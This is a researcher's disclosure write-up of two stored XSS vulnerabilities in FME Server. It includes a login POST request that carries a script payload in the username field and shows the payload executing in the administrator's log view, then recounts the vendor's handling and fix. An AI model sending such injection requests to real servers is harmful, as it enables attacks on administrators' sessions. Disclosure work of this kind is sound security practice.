While doing our work in Secura, David Van Gool and I recently found and reported two vulnerabilities in FME Server versions 2019.2 and 2020.0 Beta.

The vulnerabilities were:

  1. Unauthenticated Stored XSS
  2. Authenticated Stored XSS

The Unauthenticated Stored XSS injection parameter was in the username of the main login portal and was executed in the logs.

To test this, the following requests attempts to log in the user with the malicious username.

POST /fmeserver/login/now HTTP/1.1
Host: fme.acc.redacted.nl
[...]
referer =%2 Ffmeserver &username =%3Cscript%3Ealert%28%22XSS+in+Login%22%29%3C%2Fscript
%3E&password =

The server accepted it with a 200

HTTP /1.1 200 OK
[...]

If an Administrator navigates to the log page at https://fme.acc.redacted.nl/fmeserver/#/systemevents/history?page=1 and views the event above, the following would be returned by the server.

HTTP/1.1 200 OK
Content -Type: application /json;charset=UTF -8
X-Powered -By: ARR /3.0
Date: Mon , 02 Mar 2020 14:23:11 GMT
Connection : close
Content -Length: 37250
{" offset ":0 ," limit ":100 ," totalCount ":1396 ," items ":[{" dateFinished ":"2020 -03 -02 T15
:22:43+01:00" ," name ":" SYSTEMEVENT_LOGIN_FAILURE "," header ":{" systemEvent . description
":" Failed login on web interface ."," source ":" system -event "," time ":"2020 -03 -02 T15
:22:43+01:00" ," user ":

<script >alert(\”XSS in Login\”) <\/script >

"," systemEvent .title
":" Failed Login "},"id ":7439 ," body ":" Failed login by user <script >alert(\"XSS in
Login\") <\/script > due to insufficient credentials ."}

The exact same thing happens with the Name field while creating/deleting/- modifying users.

Throughout all the application they were using JSON to display information, I guess that to prevent this but in the logs the information was rendered as HTML without any output encoding, therefore executing the malicious payload.

Reporting the vulnerability.

As part of Secura Responsible disclosure the vulnerability was reported last month to the vendor and was fixed in the following versions

There was a form in their website, I submitted a bug report with a redacted pdf and got an automatic email:

————

————-

Same day I got an email confirming the vuln

————-

Then they closed the ticket

————-

And finally they confirmed the fix 🙂

————

In general they were very helpful during the process.